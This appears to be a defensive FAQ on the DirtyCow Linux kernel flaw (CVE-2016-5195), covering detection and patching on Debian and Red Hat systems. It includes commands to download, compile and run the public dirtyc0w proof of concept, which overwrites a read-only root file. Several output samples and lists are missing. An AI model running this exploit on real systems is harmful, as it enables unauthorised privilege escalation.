What is the DirtyCow vulnerability?
A vulnerability has been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks. This race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system. This could be abused by an attacker to modify existing “setuid” files with instructions to elevate privileges. An exploit using this technique has been found in the wild.
When was it found?
The bug has existed since around 2.6.22 (released in 2007) and was fixed on Oct 18, 2016.
Who found this vulnerability?
Phil Oester
How to get the PoC and check?
You can get the PoC from:
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
You can check it using the following steps:
Run it as follows. First be root:
# useradd dirtycow
# cd /home/dirtycow
# echo "No privileges to edit this file" > test.txt
# cat test.txt
No privileges to edit this file
# chmod 0404 test.txt
# ls -al test.txt
-r-----r-- 1 root root 45 Oct 21 00:43 test.txt
Run it as a normal user:
$ su - dirtycow
$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c
$ gcc -pthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w test.txt TESTDIRTYCOW
mmap 7fc46bb9a000
madvise 0
procselfmem 1000000000
Check the contents of the file “test.txt”. You can see that the file was modified:
$ cat test.txt
TESTDIRTYCOWs to edit this file
How to check whether your system is affected by this vulnerability?
In Ubuntu/Debian
To find out if your server is affected, check your kernel version.
# uname -rv
You’ll see output like this:
Output
If your version is earlier than the following, you are affected:
In CentOS/RHEL
If you’re on CentOS, you can use this script provided by Red Hat to test whether your server is vulnerable. To do so, first download the script.
# wget https://access.redhat.com/sites/default/files/rh-cve-2016-5195_1.sh
Then run it with bash.
# bash rh-cve-2016-5195_1.sh
If you’re vulnerable, you’ll see output like this:
Output
How can this be fixed?
1. Ubuntu/Debian
Ubuntu/Debian users are lucky: they can simply update their system using the following commands and reboot the server.
Update packages using apt-get.
# sudo apt-get update && sudo apt-get dist-upgrade
Reboot your server to apply the changes.
# sudo reboot
2. CentOS/RHEL
CentOS/RHEL has still not released the security patch for the Dirty Cow vulnerability. Once the patch is released, update the OS with this security patch. This can be done using “yum update”; reboot the server after the update to load the patched kernel. You can track updates from https://access.redhat.com/security/vulnerabilities/2706661
How to check whether the currently booted kernel is patched?
# rpm -q --changelog kernel-`uname -r` | grep CVE-2016-5195
If the above output is empty, then you have to patch your kernel immediately.
Red Hat has released patches; you can apply them by updating the kernel packages using yum:
# yum update
Reboot your server to apply the changes.
# shutdown -r now
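The changelog check above looks only at the booted kernel, so after “yum update” it still prints nothing until the server is rebooted. The following is an added example, not part of the original article or Red Hat's script, that separates "patched", "reboot-required" and "vulnerable"; the function names and the sample changelog text are constructed for illustration.

```shell
#!/bin/sh
# Added example, not part of the original article or Red Hat's script.
CVE="CVE-2016-5195"

# Constructed changelog excerpts so the logic can be tried without rpm.
SAMPLE_OLD='* Tue Aug 23 2016 Example Builder <builder@example.invalid>
- [fs] unrelated change'
SAMPLE_FIXED='* Wed Oct 19 2016 Example Builder <builder@example.invalid>
- [mm] fix copy-on-write race {CVE-2016-5195}'

# has_fix TEXT: succeeds if the changelog text mentions the CVE.
has_fix() {
    printf '%s\n' "$1" | grep -q -- "$CVE"
}

# kernel_status RUNNING_LOG OTHER_INSTALLED_LOGS
# Prints one of: patched | reboot-required | vulnerable | unknown
kernel_status() {
    if [ -z "$1" ]; then
        echo unknown            # booted kernel is not an installed rpm
    elif has_fix "$1"; then
        echo patched
    elif has_fix "$2"; then
        echo reboot-required    # fixed kernel installed but not booted
    else
        echo vulnerable
    fi
}

# live_status: collect the real changelogs on an RPM-based host.
live_status() {
    running_pkg="kernel-$(uname -r)"
    running_log=$(rpm -q --changelog "$running_pkg" 2>/dev/null) || running_log=""
    other_logs=$(for pkg in $(rpm -q kernel 2>/dev/null | grep '^kernel-'); do
        [ "$pkg" = "$running_pkg" ] || rpm -q --changelog "$pkg"
    done)
    kernel_status "$running_log" "$other_logs"
}

# Query the host only when asked: sh check.sh --live
if [ "${1:-}" = "--live" ]; then
    live_status
fi
```

A result of "reboot-required" means the update succeeded but the old kernel is still running.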
How can we know which distributions are affected by this vulnerability?
Most Linux distributions are affected by this vulnerability. Some of them are as follows:
Upgrade your Linux kernels to fix CVE-2016-5195.